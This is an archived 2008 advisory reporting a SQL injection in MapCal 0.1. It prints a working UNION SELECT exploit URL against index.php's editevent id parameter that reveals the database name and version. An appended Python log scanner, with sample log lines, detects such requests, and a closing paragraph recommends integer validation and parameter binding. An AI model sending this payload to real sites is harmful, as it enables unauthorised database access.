Computer Security
[EN] securityvulns.ru

From:Guns_(at)_0x90.com.ar <Guns_(at)_0x90.com.ar>
Date:24.09.2008
Subject:MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

      _____          ____   _____
     /  _  \ /\  /\ / _  \ /  _  \
     | | | | \ \/ / ||_| | | | | |  
     | | | |  \  /  \_   | | | | |  
     | |_| |  /  \   __\ | | |_| |
     \_____/ / /\ \ |____/ \_____/
             \/  \/

[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: MapCal - The Mapping Calendar

[~] site: http://mapcal.sourceforge.net

[~] Vulnerability Class: SQL Injection



[~] Exploit:

http://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,
0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events
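
A detection check for the request shape shown above, added here as an example and not part of the original advisory: it scans web access-log lines for `action=editevent` requests whose `id` parameter is not a plain integer. The log format, the sample lines, and the assumption that legitimate event ids are short non-negative integers are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not taken from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Sep/2008:10:00:01 +0000] "GET /cms/index.php?action=editevent&id=17 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Sep/2008:10:02:37 +0000] "GET /cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90+from+events HTTP/1.1" 200 6011',
    '192.0.2.44 - - [24/Sep/2008:10:03:02 +0000] "GET /cms/index.php?action=editevent&id=17%20UNION%20SELECT%201 HTTP/1.1" 200 6011',
    '192.0.2.10 - - [24/Sep/2008:10:05:00 +0000] "GET /cms/index.php?action=viewmonth HTTP/1.1" 200 9000',
]

# Request line inside the quoted field of a common-log-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate event id is a non-negative integer of at most 10 digits.
VALID_ID_RE = re.compile(r'[0-9]{1,10}')


def suspicious_editevent_requests(lines):
    """Return (client_ip, decoded_id) for editevent requests with a non-integer id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        # parse_qs URL-decodes values, so '+' and '%20' both become spaces.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "editevent" not in query.get("action", []):
            continue
        for value in query.get("id", []):
            if not VALID_ID_RE.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_editevent_requests(SAMPLE_LOG):
        print(f"{ip}: non-integer id in editevent request: {value!r}")
```

An allow-list on the parameter type catches encoded and mixed-case variants that a keyword match on "union select" would miss. Enforcing the same integer-only rule on `id` in the application before the query is built, or binding it as a query parameter, addresses the injection itself.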
